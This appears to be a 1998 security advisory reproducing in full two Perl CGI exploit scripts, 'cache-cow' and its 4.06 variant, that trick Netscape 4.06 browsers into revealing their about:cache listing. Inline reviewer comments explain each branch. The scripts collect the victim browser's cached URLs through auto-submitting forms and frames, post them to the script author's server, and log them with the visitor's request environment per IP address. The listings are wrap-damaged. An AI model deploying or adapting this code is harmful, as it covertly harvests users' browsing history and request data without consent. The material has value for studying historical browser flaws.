COMMAND
Netscape 4.06
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
Below is the source code for the two versions of the Netscape cache
exploit recently discovered by Dan Brumleve, as found on his web site
at
http://www.shout.net/~nothing/cache-cow/index.html
The first version, <cache-cow.cgi>, is listed first, followed by the
second version, <view-cache-cow-4.06.cgi> (both are badly wrapped!).
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing@shout.net>, 1998.08.23
#
# Reviewer notes.  The advisory says the listing is wrap-damaged; it is
# reproduced verbatim below and is not expected to run as shown.
# What the script visibly does: it serves one of three responses
# depending on which CGI variable is set, collects a form field named
# "cache" from a visiting browser, and appends that field together with
# the complete CGI environment to a per-client-IP file under logs/.
# Server-side artifacts a defender would look for: a request whose path
# carries HTML/<script> markup (mode 3 below), a POST containing a single
# "cache" field, and the logs/log-<ip>.txt files, which hold visitors'
# request data and should be treated as sensitive.
# Perl hygiene: no `use strict`/`use warnings`, bareword filehandle,
# two-argument unchecked open, unbounded read of a client-supplied length.
#
# URL of this script; interpolated into the HTML below as the form
# target and as the redirect location.
my $self = "http://www.shout.net/nothing/cache-cow.cgi";
# Dispatch on whichever CGI variable is present, in this order.
if ($ENV{PATH_INFO}) {
# Mode 1 (extra path after the script name): emit an auto-submitting
# form.  The heredoc is squeezed first -- every newline and space is
# removed -- which is why the markup may be split mid-word.  Because of
# <base href="about:">, the relative action "cache" resolves against the
# about: scheme rather than against $self.
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><base href="about:"><for
m name=f action=cache method=post><input type=submit></form></body>
</html>
EOF
# Mode 2 (request body present): decode the POSTed form and log it.
} elsif ($ENV{CONTENT_LENGTH}) {
# read() takes exactly CONTENT_LENGTH bytes from STDIN with no upper
# bound; the length is client-supplied.  unescape() reverses "+" and %XX
# encoding.  extract() splits one "name=value" pair on "=" (a value that
# itself contains "=" is truncated at the first one); both subs are named,
# so they are file-global despite being declared inside this branch.
# $history is the sorted, newline-joined list of values found in the
# "cache" field (itself "&"-separated name=value pairs) with a leading
# "about:" stripped; `$v||()` drops empty values.
# The whole %ENV (under CGI this typically includes the request headers
# and the client address) plus $history is appended to
# logs/log-<REMOTE_ADDR>.txt.  The open is two-argument, on a bareword
# handle, and unchecked: if logs/ is missing the write fails silently.
# The same list is echoed back to the client as text/plain.
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
"browser:\n\n$history";
# Mode 3 (plain GET, nothing else set): answer with a Location: header
# whose target is $self followed by a path made of HTML and <script>
# markup, again squeezed of spaces and newlines.  That markup defines
# moo(), which joins every entry of document.links (each URL-escaped and
# prefixed "href=") with "&", stores it in the hidden "cache" field and
# auto-submits the form back to $self, i.e. into mode 2.  Which document
# the script ends up executing in is not stated in the listing.
} else {
(my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n";
$self/></a></body><script>function chunk(s){return("href=
"+escape(s));}function moo(){if(!document.links.length){return("");
}var str=chunk(document.links[0]);var i=document.links.length;
while(--i){str+="&"+chunk(document.links[i]);}return(str);}
</script><body onLoad="document.f.cache.value=moo();
document.f.submit()"><form action="$self" name=f method=post>
<input type=hidden name=cache><input type=submit></form>
<a href=$self
EOF
}
exit 0;
-----snip-----
-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing@shout.net>, 1998.09.26
#
# Reviewer notes.  As with the first listing this one is wrap-damaged
# (the advisory says so) and is reproduced verbatim; it is not expected
# to run as shown.
# Compared with cache-cow.cgi, the redirect-with-markup-in-the-path is
# gone: a plain GET now returns a two-frame frameset, one frame loading
# "$self?cow" (the QUERY_STRING branch, which carries the script) and the
# other "$self/cache" (the PATH_INFO branch, the auto-submitting form).
# The POST-and-log branch is unchanged.  Server-side artifacts: GETs for
# "?cow" and "/cache" from the same client, a POST with a single "cache"
# field, and the logs/log-<ip>.txt files, which hold visitors' request
# data and should be treated as sensitive.
# Perl hygiene: no `use strict`/`use warnings`, bareword filehandle,
# two-argument unchecked open, unbounded read of a client-supplied length.
#
# URL of this script; interpolated as form target and frame sources.
my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";
# Dispatch on whichever CGI variable is present, in this order.
if ($ENV{QUERY_STRING}) {
# Mode 1 (any query string): the page holding the script.  moo(d) joins
# every entry of d.links ("href=" + escaped URL) with "&".  check() runs
# it against top.cache.document -- the sibling frame named "cache" --
# and if the result is empty reloads this frame and tries again (there is
# no limit on the retries); otherwise it stores the result in the hidden
# "cache" field and submits the form to $self with target=_top, i.e. into
# mode 3.  The heredoc is squeezed of newlines and spaces before printing.
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><head><script>function chunk(s){return("href=" + escape(s));}
function moo(d){if(!d.l inks.length){return("");} var str=chunk(d.
links[0]);var i=d.links.length;while(--i){str+="&"+chunk(d.links[
i]);} return(s tr);}function check(){ var m=moo(top.cache.document);
if (m=="") { document.location.reload(); return; }document.f.cache.value=m;
doc ument.f.submit();}</script></head><body onLoad="check()"><
form action="$self" name=f target=_top method=post><input type=hidden name=cache><
input type=submit></form></body></html>
EOF
# Mode 2 (extra path after the script name): auto-submitting form whose
# relative action "cache" resolves against <base href="about:">, not
# against $self.  Identical to the first listing.
} elsif ($ENV{PATH_INFO}) {
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><base href="about:"><for
m name=f action=cache method=post><input type=submit></form></body>
</html>
EOF
# Mode 3 (request body present): decode the POSTed form and log it.
} elsif ($ENV{CONTENT_LENGTH}) {
# read() takes exactly CONTENT_LENGTH bytes from STDIN with no upper
# bound; the length is client-supplied.  unescape() reverses "+" and %XX
# encoding; extract() splits one "name=value" pair at the first "=".
# Both subs are named and therefore file-global despite where they sit.
# $history is the sorted, newline-joined list of values from the "cache"
# field with a leading "about:" stripped; `$v||()` drops empty values.
# The whole %ENV (under CGI typically the request headers and client
# address) plus $history is appended to logs/log-<REMOTE_ADDR>.txt through
# an unchecked two-argument open on a bareword handle, so a missing logs/
# directory fails silently.  The list is echoed back as text/plain.
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
"browser:\n\n$history";
# Mode 4 (plain GET, nothing else set): the entry page.  A frameset with
# a one-row "cow" frame (mode 1) above a "cache" frame (mode 2).  This
# heredoc is printed as-is, without the squeeze used by the other modes.
} else {
print"Content-type: text/html\n\n".<<" EOF";
<html><head> <frameset rows="1,*"><frame src=
"$self?cow" name=cow><frame src="$self/cache"
name=cache></frameset></head></html>
EOF
}
exit 0;
SOLUTION
It is not known whether version 4.5 addresses this.